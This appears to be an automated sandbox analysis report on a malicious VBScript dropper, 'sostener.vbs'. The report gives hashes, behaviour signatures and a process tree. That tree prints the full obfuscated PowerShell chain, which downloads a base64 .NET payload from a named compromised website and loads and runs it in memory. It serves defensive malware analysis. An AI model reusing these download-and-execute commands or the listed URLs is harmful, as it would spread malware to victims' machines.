Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2024 16:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    438KB

  • MD5

    e62e7e185f8b7c1add47167fe2f9d732

  • SHA1

    b2a17258ae76d630a78f0af855e8f098fea90147

  • SHA256

    dc5c366ec0d83b4f56c482049378ad6ff837a0160c72620edd2021e270d4572d

  • SHA512

    3cd6e2257faecceac6b8c04e9def5620f3efdbf31afd1119ecea8edffcb96adc3e21b20609077b03c7c14755830f757579c2c5b4d05a8998f65bd240312cb472

  • SSDEEP

    96:8wDsQc7lY5K8kyRllDiq0qzhELI/vlewa0bO:8wHOlY5K8kyRl9iuhYAvgwpO

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.alertainmediatacolombia.com/wp/wp-content/uploads/2024/09/dllsky.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bp▒G0▒e▒Br▒Gk▒I▒▒9▒C▒▒Jw▒w▒DE▒Mw▒n▒Ds▒J▒B4▒HY▒eQB1▒HQ▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bn▒Ho▒YwBt▒GQ▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒dwB3▒Hc▒LgBh▒Gw▒ZQBy▒HQ▒YQBp▒G4▒bQBl▒GQ▒aQBh▒HQ▒YQBj▒G8▒b▒Bv▒G0▒YgBp▒GE▒LgBj▒G8▒bQ▒v▒Hc▒c▒▒v▒Hc▒c▒▒t▒GM▒bwBu▒HQ▒ZQBu▒HQ▒LwB1▒H▒▒b▒Bv▒GE▒Z▒Bz▒C8▒Mg▒w▒DI▒N▒▒v▒D▒▒OQ▒v▒GQ▒b▒Bs▒HM▒awB5▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒Gc▒egBj▒G0▒Z▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒Lg▒x▒Eo▒R▒▒v▒FM▒VgBO▒EU▒LwB6▒HI▒YQBN▒C8▒ZwBl▒FI▒LwBr▒GE▒V▒▒v▒Dk▒Ng▒x▒C4▒Mw▒z▒DI▒Lg▒y▒D▒▒Mg▒u▒DE▒OQ▒v▒C8▒OgBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒HY▒eQB1▒HQ▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gk▒bQB4▒Gs▒aQ▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxki = '013';$xvyut = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $gzcmd = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.alertainmediatacolombia.com/wp/wp-content/uploads/2024/09/dllsky.txt'));[system.AppDomain]::CurrentDomain.Load($gzcmd).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $xvyut , '_______________________-------------', $imxki, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    a3a7c939b8f39203bc23a4b969f0cc93

    SHA1

    c5c7937e512ca031410cb2fcc621257df0ae4e9a

    SHA256

    719686eaa1c26dbf1ea847cb90bec7dfaacf46c3143dffbfe86f27feb6d85930

    SHA512

    4c11609a3b42e34e6350a4b04d441f49629cc1d5d280a3ff8b183a5365b2da12028ae9cc133d81a1c279a0a2a137d6ca548a1267d5e0f41ac83e4e2b4b691d5a

    Download Submit

  • memory/2948-4-0x000007FEF666E000-0x000007FEF666F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2948-5-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2948-7-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2948-6-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-8-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-9-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-10-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-11-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2948-17-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

    Filesize

    9.6MB

    Download